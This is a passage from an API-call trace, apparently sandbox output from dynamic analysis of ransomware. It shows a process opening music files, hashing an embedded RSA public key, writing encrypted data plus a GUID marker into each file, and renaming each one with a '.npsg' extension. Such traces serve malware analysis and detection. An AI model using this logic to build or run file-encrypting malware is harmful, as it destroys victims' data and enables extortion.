lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.993] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.993] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.993] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.993] CloseHandle (hObject=0x644) returned 1 [0236.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b81cd0 [0236.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.994] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kvDGm-aGpcHQ8p2smqpu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kvdgm-agpchq8p2smqpu.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kvDGm-aGpcHQ8p2smqpu.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kvdgm-agpchq8p2smqpu.m4a.npsg")) returned 1 [0236.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.996] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0236.998] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67c59ec0, ftCreationTime.dwHighDateTime=0x1d5c342, ftLastAccessTime.dwLowDateTime=0xc1b6e0, ftLastAccessTime.dwHighDateTime=0x1d5bb0a, ftLastWriteTime.dwLowDateTime=0xc1b6e0, ftLastWriteTime.dwHighDateTime=0x1d5bb0a, nFileSizeHigh=0x0, nFileSizeLow=0x18a70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LB CSJo4-v.m4a", cAlternateFileName="LBCSJO~1.M4A")) returned 1 [0236.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.998] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LB CSJo4-v.m4a") returned=".m4a" [0236.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LB CSJo4-v.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lb csjo4-v.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.998] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=100976) returned 1 [0236.999] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.001] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18a4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.001] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.003] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.003] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x18a70, lpOverlapped=0x0) returned 1 [0237.004] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.004] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.004] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.004] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0237.005] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.006] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.006] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.006] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.006] GetLastError () returned 0x0 [0237.006] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.006] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0237.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.006] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.006] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.006] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18a70) returned 0x3b95d50 [0237.007] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95b30 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003f8 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95b78 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400410 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400440 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004a0 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400458 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0237.007] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90a38 [0237.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b81cd0 [0237.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400440 | out: hHeap=0x620000) returned 1 [0237.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400458 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004a0 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004a0 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400458 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400440 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400458 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400440 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004a0 | out: hHeap=0x620000) returned 1 [0237.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0237.009] GetCurrentThreadId () returned 0x5b4 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79b28 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.009] GetCurrentThreadId () returned 0x5b4 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004a0 [0237.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.011] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18a70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.011] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.011] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.011] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.011] CloseHandle (hObject=0x644) returned 1 [0237.015] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LB CSJo4-v.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lb csjo4-v.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LB CSJo4-v.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lb csjo4-v.m4a.npsg")) returned 1 [0237.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.016] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0237.018] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712e73e0, ftCreationTime.dwHighDateTime=0x1d5c399, ftLastAccessTime.dwLowDateTime=0xe54abd60, ftLastAccessTime.dwHighDateTime=0x1d5c2fe, ftLastWriteTime.dwLowDateTime=0xe54abd60, ftLastWriteTime.dwHighDateTime=0x1d5c2fe, nFileSizeHigh=0x0, nFileSizeLow=0xecb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MMJjf08EkmSTh.m4a", cAlternateFileName="MMJJF0~1.M4A")) returned 1 [0237.018] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MMJjf08EkmSTh.m4a") returned=".m4a" [0237.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MMJjf08EkmSTh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mmjjf08ekmsth.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.019] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=3787) returned 1 [0237.019] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.022] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xea5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.022] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.024] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xecb, lpOverlapped=0x0) returned 1 [0237.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.024] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0237.026] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.026] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.026] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.026] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.026] GetLastError () returned 0x0 [0237.026] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.026] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0237.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.026] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.026] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.026] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.026] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90a38 [0237.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b82ba8 [0237.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400458 | out: hHeap=0x620000) returned 1 [0237.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400470 | out: hHeap=0x620000) returned 1 [0237.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004b8 | out: hHeap=0x620000) returned 1 [0237.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b82ba8 | out: hHeap=0x620000) returned 1 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004b8 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400470 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400458 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.027] RtlAllocateHeap 